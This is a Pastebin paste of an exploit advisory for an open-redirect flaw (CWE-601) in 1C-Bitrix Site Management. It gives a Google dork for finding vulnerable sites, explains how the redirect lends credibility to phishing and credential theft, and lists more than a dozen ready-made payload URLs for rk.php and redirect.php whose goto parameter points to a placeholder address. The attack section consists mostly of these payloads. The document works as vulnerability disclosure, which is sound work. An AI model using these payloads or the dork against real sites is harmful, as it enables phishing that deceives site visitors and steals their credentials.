Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : 1C-Bitrix Site Management Russia 2.0 Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 05/03/2019
- # Vendor Homepages : 1c-bitrix.ru ~ bitrix24.com
- # Software Information Link : 1c-bitrix.ru/support/
- dev.1c-bitrix.ru/support/forum/forum6/topic68319/
- dev.1c-bitrix.ru/community/forums/forum6/topic115703/
- dev.1c-bitrix.ru/api_help/main/functions/other/localredirect.php
- training.bitrix24.com/support/training/course/?COURSE_ID=
- 68&CHAPTER_ID=05937&LESSON_PATH=5936.5937
- # Software Affected Version : 2.0 - 6.5 and previous versions
- # Software Price Type : Paid Download
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : intext:Powered by Bitrix24. Copyright © 2002-2016 Bitrix
- # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- The product Bitrix Site Manager for Russian websites is a software core for the comprehensive
- management of web projects of any complexity.
- The product Bitrix24 is a ready-made product that enables the creation of the corporate
- portal of a company with the possibility to customize standard functionality
- according to a company’s needs.
- ####################################################################
- # Impact :
- *********
- This web application Bitrix Russia Site Management 2.0 accepts a user-controlled
- input that specifies a link to an external site, and uses that link in a Redirect.
- This simplifies phishing attacks. An http parameter may contain a URL value and could cause
- the web application to redirect the request to the specified URL. By modifying the URL value
- to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts
- have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to
- steer users to malicious websites. This vulnerability is used in phishing attacks to get users
- to visit malicious sites without realizing it. Web users often encounter redirection when they
- visit the Web site of a company whose name has been changed or which has been acquired
- by another company. Visiting unreal web page user's computer becomes affected by malware
- the task of which is to deceive the valid actor and steal his personal data.
- ______________________________________________________________________
- Note : According to the Bitrix24 Company =>
- rk.php - a file used by the Advertising module by default to record banner click events.
- redirect.php - a file used by the Statistics module to record link click events.
- More information you can find in this information link =>
- training.bitrix24.com/support/training/course/?COURSE_ID=68&LESSON_ID=5945
- ####################################################################
- # Open Redirection Exploit :
- **************************
- /bitrix/rk.php?goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/redirect.php?event1=&event2=&event3=&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/redirect.php?event3=352513&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://www.[REDIRECTION-ADDRESS].gov
- bitrix/redirect.php?event1=&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=
- click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F
- %D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0
- %B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81
- %D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB
- %D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+
- %5BMOBILE_HOME%5D+Love+Card&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+
- %5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+
- %5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE
- %E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://www.[REDIRECTION-ADDRESS].gov
- bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0
- %B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE
- %D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
- /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8
- %D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA
- %D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://www.[REDIRECTION-ADDRESS].gov
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement